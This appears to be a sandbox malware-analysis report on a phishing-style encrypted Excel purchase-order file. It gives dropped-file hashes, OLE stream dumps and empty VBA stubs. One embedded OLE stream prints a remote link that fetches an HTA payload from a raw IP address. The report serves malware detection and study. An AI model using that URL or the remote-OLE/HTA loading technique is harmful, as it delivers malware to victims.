                  Malicious:false
                  Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/15/2025 08:01:42.812.EXCEL (0x1BC4).0x350.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":18,"Time":"2025-03-15T08:01:42.812Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T08:01:42.5629478Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T08:01:42.5629478Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-15T08:01:42.5629478Z\", \"C\" : \"\", \"Q\" : 18.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):172032
                  Entropy (8bit):6.726645213932516
                  Encrypted:false
                  SSDEEP:3072:N0N1Q24C19qA9NSG61NqNyqzVj6Wr5OkGkIsst:D6OArSnGyqzVVr0kOsst
                  MD5:0EEB980739ED8D1288880871E711AD5B
                  SHA1:E4FF2738A50FB5BFA880B8B1E0FCE25015626AAC
                  SHA-256:3C383104F68E81F40FBB949583386D1D61DA1538EAB5DD415AC5CCC3F7C33F10
                  SHA-512:F0B995B706C5D5942C750A7A149DE03AB81567A9CFBD247843586E29DB1E6686600258F22671AA30FB140F784715CF8B62EBE26B62B146AE631E4493C64CA2C5
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Mar 15 08:01:41 2025, Security: 1
                  Category:dropped
                  Size (bytes):1069568
                  Entropy (8bit):7.8563155436118075
                  Encrypted:false
                  SSDEEP:24576:BoB6DHtWjejsk4McuKJIwgxIOXR8YhbBWvdp8tLUWBMDcb:ASaejH4MTKzguM8YkpwLUwh
                  MD5:45359942E3E692ACC1740F0065AD2D4F
                  SHA1:7BF9E229B8D23B1974491431BEFF9A8EC82198B5
                  SHA-256:B6CC54DDA17A53C6ED30490C3B9B38AEDBA4A1E7B09F6CE06718795A05F1F7CC
                  SHA-512:4B2F34B540FBDF425B5C28C904E97E27EEFCB664EDD9AA016F695903065FD219545B75F4363F31666E4CF6541818E04DB6C0CE0822B0E46AF5F5226FDAC1813C
                  Malicious:false
                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sat Mar 15 08:01:41 2025, Security: 1
                  Category:dropped
                  Size (bytes):1069568
                  Entropy (8bit):7.8563155436118075
                  Encrypted:false
                  SSDEEP:24576:BoB6DHtWjejsk4McuKJIwgxIOXR8YhbBWvdp8tLUWBMDcb:ASaejH4MTKzguM8YkpwLUwh
                  MD5:45359942E3E692ACC1740F0065AD2D4F
                  SHA1:7BF9E229B8D23B1974491431BEFF9A8EC82198B5
                  SHA-256:B6CC54DDA17A53C6ED30490C3B9B38AEDBA4A1E7B09F6CE06718795A05F1F7CC
                  SHA-512:4B2F34B540FBDF425B5C28C904E97E27EEFCB664EDD9AA016F695903065FD219545B75F4363F31666E4CF6541818E04DB6C0CE0822B0E46AF5F5226FDAC1813C
                  Malicious:false
                  Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):165
                  Entropy (8bit):1.4134958568691696
                  Encrypted:false
                  SSDEEP:3:D//nEwmM:DXEwmM
                  MD5:8B6F49EF043D1AF562C216108A13E0F2
                  SHA1:0106337F6D46E83B30CA7C1563C3FC3AF4209AF3
                  SHA-256:C80D5433620A06CF252C9489F9A46BA091A5DAA239AAC3A98DB918627DEFF314
                  SHA-512:241592FDA43D686AF92D22B2B451C51E70B742A5C33FA94307613155906396A53501E05719DD568C3D3C8088B95B83D7E98393B3692EB4B01907FE8BD927E896
                  Malicious:true
                  Preview:.user ..M.a.o.g.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Mar 13 07:45:29 2025, Security: 1
                  Entropy (8bit):7.83097068580852
                  TrID:
                  • Microsoft Excel sheet (30009/1) 47.99%
                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                  File name:PO-ARJ-2025-15ACA.xla.xlsx
                  File size:1'172'992 bytes
                  MD5:9d0c7d82a1c18e1006e6075584652e83
                  SHA1:68f97d343b3419df1b2d25c50c0d72d6af4fd59e
                  SHA256:34954100e490a77310918573e56868e651855b54ddb0cc0dd334f55e8e195f14
                  SHA512:27c408248899964717c7f99e7b5c0a7a1c54e1ba9e99d4f2810ca32b81830f1f42922fe90a2de261bc2490d92adf003868ba461b6afa40af9459cafec1544076
                  SSDEEP:24576:VLA6DHtWjejsk4Mcu+JIwgxIOXR8YhbBWvdp8tLUWBMDcMI:iSaejH4MT+zguM8YkpwLUwhR
                  TLSH:DC450294BFC05626DA1D03340FE38B1C5A15AEEA5795620F3235BE1D3EB6B3E0B72509
                  File Content Preview:........................>......................................................................................................................................................................................................................................
                  Icon Hash:35e58a8c0c8a85b9
                  Document Type:OLE
                  Number of OLE Files:1
                  Has Summary Info:
                  Application Name:Microsoft Excel
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:True
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:False
                  Flash Objects Count:0
                  Contains VBA Macros:True
                  Code Page:1252
                  Author:
                  Last Saved By:
                  Create Time:2006-09-16 00:00:00
                  Last Saved Time:2025-03-13 07:45:29
                  Creating Application:Microsoft Excel
                  Security:1
                  Document Code Page:1252
                  Thumbnail Scaling Desired:False
                  Contains Dirty Links:False
                  Shared Document:False
                  Changed Hyperlinks:False
                  Application Version:786432
                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                  VBA File Name:Sheet1.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f c8 b9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet1"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                  VBA File Name:Sheet2.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f ec 7d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet2"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                  VBA File Name:Sheet3.cls
                  Stream Size:977
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f 8b 05 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "Sheet3"
                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                  VBA File Name:ThisWorkbook.cls
                  Stream Size:985
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a3 9f 7b a2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Attribute VB_Name = "ThisWorkbook"
                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                  Attribute VB_GlobalNameSpace = False
                  Attribute VB_Creatable = False
                  Attribute VB_PredeclaredId = True
                  Attribute VB_Exposed = True
                  Attribute VB_TemplateDerived = False
                  Attribute VB_Customizable = True
                  

                  General
                  Stream Path:\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:244
                  Entropy:2.889430592781307
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                  General
                  Stream Path:\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:200
                  Entropy:3.2920681057018664
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                  General
                  Stream Path:MBD003296A8/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.25248375192737
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD003296A8/\x5DocumentSummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:296
                  Entropy:3.2973193143624515
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                  General
                  Stream Path:MBD003296A8/\x5SummaryInformation
                  CLSID:
                  File Type:data
                  Stream Size:31156
                  Entropy:3.1876994904322484
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                  General
                  Stream Path:MBD003296A8/MBD00320C7F/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.219515110876372
                  Base64 Encoded:False
                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD003296A8/MBD00320C7F/Package
                  CLSID:
                  File Type:Microsoft Excel 2007+
                  Stream Size:613686
                  Entropy:7.989056691241232
                  Base64 Encoded:True
                  Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD003296A8/MBD00321A49/\x1CompObj
                  CLSID:
                  File Type:data
                  Stream Size:114
                  Entropy:4.219515110876372
                  Base64 Encoded:False
                  Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD003296A8/MBD00321A49/Package
                  CLSID:
                  File Type:Microsoft Excel 2007+
                  Stream Size:13665
                  Entropy:7.1661074658165225
                  Base64 Encoded:True
                  Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 c8 9d a8 db 7e 01 00 00 85 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  General
                  Stream Path:MBD003296A8/Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:392615
                  Entropy:7.73377528201003
                  Base64 Encoded:True
                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . h : . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . .
                  Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                  General
                  Stream Path:MBD003296A9/\x1Ole
                  CLSID:
                  File Type:data
                  Stream Size:600
                  Entropy:4.504542341869483
                  Base64 Encoded:False
                  Data ASCII:. . . . I . d J . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . 1 . 9 . 8 . . . 1 . 2 . . . 8 . 9 . . . 2 . 4 . / . x . a . m . p . p . / . k . v . r . m . o . t . / . k . v . r . m . / . g . r . e . a . t . c . o . m . e . b . a . c . k . d . o . i . n . g . f . o . r . e . v . e . r . w . i . t . h . g . r . e . a . t . . . h . t . a . . . } . c 2 k ~ . ; Y . . M . P ~ # . . . . . . . . . . . . . . . . : . . . j . u . l . 8 . i . m . Q . H . R . N . L . i . 4 . k . 6 . a . g .
                  Data Raw:01 00 00 02 87 fd 49 10 64 b2 87 4a 00 00 00 00 00 00 00 00 00 00 00 00 be 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b ba 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 31 00 39 00 38 00 2e 00 31 00 32 00 2e 00 38 00 39 00 2e 00 32 00 34 00 2f 00 78 00 61 00 6d 00 70 00 70 00 2f 00 6b 00 76 00 72 00 6d 00 6f 00 74 00 2f 00 6b 00 76 00 72 00 6d 00 2f 00 67 00 72 00
                  General
                  Stream Path:Workbook
                  CLSID:
                  File Type:Applesoft BASIC program data, first line number 16
                  Stream Size:96277
                  Entropy:7.991704392584178
                  Base64 Encoded:True
